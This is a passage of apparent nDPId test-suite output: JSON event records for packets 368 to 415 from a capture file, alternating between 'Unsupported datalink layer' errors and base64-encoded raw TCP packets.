layer","datalink":12,"packet_id":368,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802808} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":368,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHcQABABoENwKi0ArL40DbC2QBQ64tGkd7ro4OAEBpZEFIAAAEBCAoANYjtRwYMWQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":369,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802808} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":369,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHdQABABoEMwKi0ArL40DbC2QBQ64tGkd7rqO+AEBqGCrgAAAEBCAoANYjtRwYMWg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":370,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802810} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":370,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHeQABABoELwKi0ArL40DbC2QBQ64tGkd7rrluAEBqzBR4AAAEBCAoANYjtRwYMWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":371,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802870} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":371,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHfQABABoEKwKi0ArL40DbC2QBQ64tGkd7rs8eAEBrg\/24AAAEBCAoANYjzRwYMaw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":372,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802876} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":372,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHgQABABoEJwKi0ArL40DbC2QBQ64tGkd7ruTOAEBsO+dQAAAEBCAoANYjzRwYMaw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":373,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802928} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":373,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHhQABABoD8wKi0ArL40DbC2QBQ64tGkd7ruTOwEBsOgzQAAAEBCAoANYj5RwYMawEBBQre676f3uvECw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":374,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802929} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":374,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHiQABABoD7wKi0ArL40DbC2QBQ64tGkd7ruTOwEBsOfcgAAAEBCAoANYj5RwYMawEBBQre676f3uvJdw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":375,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803734} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":375,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHjQABABoEGwKi0ArL40DbC2QBQ64tGkd7ryXeAEBs76DMAAAEBCAoANYlJRwYNRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":376,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803761} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":376,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHkQABABoD5wKi0ArL40DbC2QBQ64tGkd7ryXewEBs7O14AAAEBCAoANYlMRwYNRQEBBQre69m73uvfJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":377,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803763} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":377,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHlQABABoD4wKi0ArL40DbC2QBQ64tGkd7ryXewEBs7NfIAAAEBCAoANYlMRwYNRQEBBQre69m73uvkkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":378,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803853} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":378,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHmQABABoD3wKi0ArL40DbC2QBQ64tGkd7rzuOwEBtoMDkAAAEBCAoANYlVRwYNXAEBBQre69m73uvkkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":379,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803856} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":379,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHnQABABoD2wKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVKqAAAAEBCAoANYlVRwYNXAEBBQre69m73uvkkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":380,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803902} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":380,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHoQABABoD1wKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVJS8AAAEBCAoANYlaRwYNXAEBBQre69m73uvp\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":381,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803910} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":381,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHpQABABoD0wKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVH8MAAAEBCAoANYlaRwYNXAEBBQre69m73uvvaw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":382,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803963} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":382,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHqQABABoDzwKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVGlEAAAEBCAoANYlgRwYNXAEBBQre69m73uv01w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":383,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804019} -00350{"packet_event_id":1,"packet_event_name":"packet","packet_id":383,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHrQABABoDqwKi0ArL40DbC2QBQ64tGkd7r1E\/QEBuVQm8AAAEBCAoANYlmRwYNXAEBBRLe6\/pD3uv\/r97r2bve6\/TX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":384,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804085} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":384,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHsQABABoDpwKi0ArL40DbC2QBQ64tGkd7r1E\/QEBuVPP0AAAEBCAoANYlsRwYNXAEBBRLe6\/pD3uwFG97r2bve6\/TX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":385,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804142} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":385,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHtQABABoDowKi0ArL40DbC2QBQ64tGkd7r1E\/QEBuVN4sAAAEBCAoANYlyRwYNXAEBBRLe6\/pD3uwKh97r2bve6\/TX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":386,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804187} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":386,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHuQABABoDvwKi0ArL40DbC2QBQ64tGkd7r9NewEBvDwvMAAAEBCAoANYl2RwYNtQEBBQre6\/pD3uwKhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":387,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805160} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":387,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHvQABABoD6wKi0ArL40DbC2QBQ64tGkd7sCoeAEBvwpJEAAAEBCAoANYnYRwYOkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":388,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805221} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":388,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHwQABABoDtwKi0ArL40DbC2QBQ64tGkd7sCoewEBvwi0gAAAEBCAoANYneRwYOkwEBBQre7A\/z3uwVXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":389,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805221} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":389,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHxQABABoDswKi0ArL40DbC2QBQ64tGkd7sCoewEBvwhdwAAAEBCAoANYneRwYOkwEBBQre7A\/z3uwayw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":390,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805298} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":390,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHyQABABoDjwKi0ArL40DbC2QBQ64tGkd7sCofQEBvwd8AAAAEBCAoANYnmRwYOkwEBBRLe7BVf3uway97sD\/Pe7BrL"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":391,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805675} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":391,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHzQABABoD2wKi0ArL40DbC2QBQ64tGkd7sGsuAEBwdk3MAAAEBCAoANYoMRwYPDA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":392,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805741} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH0QABABoD1wKi0ArL40DbC2QBQ64tGkd7sIDeAEBxKjaUAAAEBCAoANYoSRwYPOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":393,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805742} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":393,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH1QABABoD0wKi0ArL40DbC2QBQ64tGkd7sJaOAEBx4iAsAAAEBCAoANYoSRwYPOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":394,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805799} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":394,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH2QABABoDzwKi0ArL40DbC2QBQ64tGkd7sKw+AEBylgl4AAAEBCAoANYoYRwYPSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":395,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805800} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":395,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH3QABABoDywKi0ArL40DbC2QBQ64tGkd7sMHuAEBzSfMUAAAEBCAoANYoYRwYPSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":396,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805801} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":396,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH4QABABoDxwKi0ArL40DbC2QBQ64tGkd7sNeeAEBz\/dywAAAEBCAoANYoYRwYPSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":397,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805827} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":397,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH5QABABoDwwKi0ArL40DbC2QBQ64tGkd7sO1OAEB0tcYEAAAEBCAoANYobRwYPVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":398,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805828} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":398,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH6QABABoDvwKi0ArL40DbC2QBQ64tGkd7sQL+AEB1aa+gAAAEBCAoANYobRwYPVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":399,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805834} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":399,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH7QABABoDuwKi0ArL40DbC2QBQ64tGkd7sRiuAEB2HZk4AAAEBCAoANYobRwYPWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":400,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":400,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH8QABABoDtwKi0ArL40DbC2QBQ64tGkd7sS5eAEB20YKwAAAEBCAoANYoeRwYPXg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":401,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805857} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":401,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH9QABABoDswKi0ArL40DbC2QBQ64tGkd7sUQOAEB3iWxIAAAEBCAoANYoeRwYPXg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":402,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805922} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":402,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH+QABABoDrwKi0ArL40DbC2QBQ64tGkd7sVm+AEB4PVW4AAAEBCAoANYokRwYPYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":403,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805926} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":403,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH\/QABABoDqwKi0ArL40DbC2QBQ64tGkd7sW9uAEB48T9UAAAEBCAoANYokRwYPYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":404,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805935} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":404,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIAQABABoDdwKi0ArL40DbC2QBQ64tGkd7sW9uwEB48k+gAAAEBCAoANYolRwYPYwEBBQre7GFH3uxmsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":405,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806011} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":405,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIBQABABoDUwKi0ArL40DbC2QBQ64tGkd7sW9vQEB48zXMAAAEBCAoANYotRwYPYwEBBRLe7HGL3ux2997sYUfe7Gaz"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":406,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806090} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":406,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMICQABABoDbwKi0ArL40DbC2QBQ64tGkd7sZrOwEB5paCIAAAEBCAoANYo1RwYPjAEBBQre7HGL3ux29w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":407,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806492} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":407,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIDQABABoDawKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XYgoAAAEBCAoANYpdRwYP4gEBBQre7HGL3ux29w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":408,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806560} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":408,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIEQABABoDZwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XXJcAAAEBCAoANYpkRwYP4gEBBQre7HGL3ux8Yw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":409,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806561} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":409,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIFQABABoDYwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XVysAAAEBCAoANYpkRwYP4gEBBQre7HGL3uyBzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":410,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806628} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":410,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIGQABABoDPwKi0ArL40DbC2QBQ64tGkd7sbB\/QEB6XewcAAAEBCAoANYprRwYP4gEBBRLe7Hxj3uyBz97scYve7IHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":411,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806630} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":411,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIHQABABoDWwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XUbgAAAEBCAoANYprRwYP4gEBBQre7HGL3uyHOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":412,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806633} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":412,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIIQABABoDVwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XTEwAAAEBCAoANYprRwYP4gEBBQre7HGL3uyMpw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":413,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806685} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":413,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIJQABABoDUwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XRtsAAAEBCAoANYpwRwYP4gEBBQre7HGL3uySEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":414,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806695} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":414,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIKQABABoDTwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XQW0AAAEBCAoANYpyRwYP4gEBBQre7HGL3uyXfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":415,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806720} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":415,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMILQABABoDSwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XO\/8AAAEBCAoANYp0RwYP4gEBBQre7HGL3uyc6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 